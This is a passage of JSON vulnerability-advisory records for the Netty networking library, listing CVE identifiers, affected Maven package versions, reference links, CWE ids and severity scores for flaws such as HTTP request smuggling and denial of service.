"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mm9x-g8pc-w292/GHSA-mm9x-g8pc-w292.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11612" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/6168" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9924" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c30b7fca4baedebcb46d6e0f90071b30cc4a0e074164d50122ec5ec@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra98e3a8541a09271f96478d5e22c7e3bd1afdf48641c8be25d62d9f9@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd302ddb501fa02c5119120e5fc21df9a1c00e221c490edbe2d7ad365@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1ea144e91f03175d661b2d3e97c7d74b912e019613fa90419cf63f4@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ref2c8a0cbb3b8271e5b9a06457ba78ad2028128627186531730f50ef@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ref3943adbc3a8813aee0e3a9dd919bacbb27f626be030a3c6d6c7f83@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf803b65b4a57589d79cf2e83d8ece0539018d32864f932f63c972844@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9f8bcc4ca8d2788f77455ff594468404732a4497baebe319043f4d5@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfd173eac20d5e5f581c8984b685c836dafea8eb2f7ff85f617704cf1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff8859c0d06b1688344b39097f9685c43b461cf2bc41f60f001704e9@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": 
"https://security.netapp.com/advisory/ntap-20201223-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.45.Final...netty-4.1.46.Final" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r14446ed58208cb6d97b6faa6ebf145f1cf2c70c0886c0c133f4d3b6f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r255ed239e65d0596812362adc474bee96caf7ba042c7ad2f3c62cec7@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r281882fdf9ea89aac02fd2f92786693a956aac2ce9840cce87c7df6b@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2958e4d49ee046e1e561e44fdc114a0d2285927501880f15852a9b53@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31424427cc6d7db46beac481bdeed9a823fc20bb1b9deede38557f71@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3195127e46c87a680b5d1d3733470f83b886bfd3b890c50df718bed1@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3ea4918d20d0c1fa26cac74cc7cda001d8990bc43473d062867ef70d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a7e4e23bd84ac24abf30ab5d5edf989c02b555e1eca6a2f28636692@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r4f4a14d6a608db447b725ec2e96c26ac9664d83cd879aa21e2cfeb24@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5030cd8ea5df1e64cf6a7b633eff145992fbca03e8bfc687cd2427ab@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5a0b1f0b1c3bcd66f5177fbd6f6de2d0f8cae24a13ab2669f274251a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b1ad61552591b747cd31b3a908d5ff2e8f2a8a6847583dd6b7b1ee7@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r69b23a94d4ae45394cabae012dd1f4a963996869c44c478eb1c61082@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7641ee788e1eb1be4bb206a7d15f8a64ec6ef23e5ec6132d5a567695@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7836bbdbe95c99d4d725199f0c169927d4e87ba57e4beeeb699c097a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r866288c2ada00ce148b7307cdf869f15f24302b3eb2128af33830997@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88e2b91560c065ed67e62adf8f401c417e4d70256d11ea447215a70c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8a654f11e1172b0effbfd6f8d5b6ca651ae4ac724a976923c268a42f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9addb580456807cd11d6f0c6b6373b7d7161d06d2278866c30c7febb@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-119", "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T19:58:52Z", "nvd_published_at": "2020-04-07T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p2v9-g2qv-p635", "published": "2020-02-21T18:55:04Z", "modified": "2024-12-08T05:34:35.794525Z", "aliases": [ "CVE-2019-20445" ], "related": [ "CGA-3hw4-v37p-xv4c", "CGA-f836-4mqx-vr2w" ], "summary": "HTTP Request Smuggling in Netty", "details": "HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.45" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", 
"4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": 
"\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20445" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9861" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9865" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4532-1" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:25Z", "nvd_published_at": "2020-01-29T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-rv63-gqm8-9w8q", "published": "2022-05-13T01:11:43Z", "modified": "2024-02-16T08:13:46.004283Z", "aliases": [ "CVE-2016-4970" ], "summary": "Loop with Unreachable Exit Condition in Netty", "details": "handler/ssl/OpenSslEngine.java in Netty 4.0.x before 4.0.37.Final and 4.1.x before 4.1.1.Final allows remote attackers to cause a denial of service (infinite loop).", 
"affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.Alpha1" }, { "fixed": "4.0.37.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rv63-gqm8-9w8q/GHSA-rv63-gqm8-9w8q.json" } }, { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.0.Beta1" }, { "fixed": "4.1.1.Final" } ] } ], "versions": [ "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rv63-gqm8-9w8q/GHSA-rv63-gqm8-9w8q.json" } } ], "references": [ { "type": 
"ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4970" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/5364" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1343616" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/afaa5860e3a6d327eb96c3d82cbd2f5996de815a16854ed1ad310144@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://wiki.opendaylight.org/view/Security_Advisories" }, { "type": "WEB", "url": "http://netty.io/news/2016/06/07/4-0-37-Final.html" }, { "type": "WEB", "url": "http://netty.io/news/2016/06/07/4-1-1-Final.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0179.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-1097.html" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:54:08Z", "nvd_published_at": "2017-04-13T14:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xfv3-rrfm-f2rv", "published": "2020-06-30T21:01:21Z", "modified": "2024-02-16T08:04:08.954640Z", "aliases": [ "CVE-2015-2156" ], "summary": "Information Exposure in Netty", "details": "Netty before 3.9.8.Final, 3.10.x before 3.10.3.Final, 4.0.x before 4.0.28.Final, and 4.1.x before 4.1.0.Beta5 and Play Framework 2.x before 2.3.9 might allow remote attackers to bypass the httpOnly flag on cookies and obtain sensitive information by leveraging improper validation of cookie name and value characters.", "affected": [ { "package": { "name": "io.netty:netty-parent", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.28.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", 
"4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.3.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": "3.10.3.Final" } ] 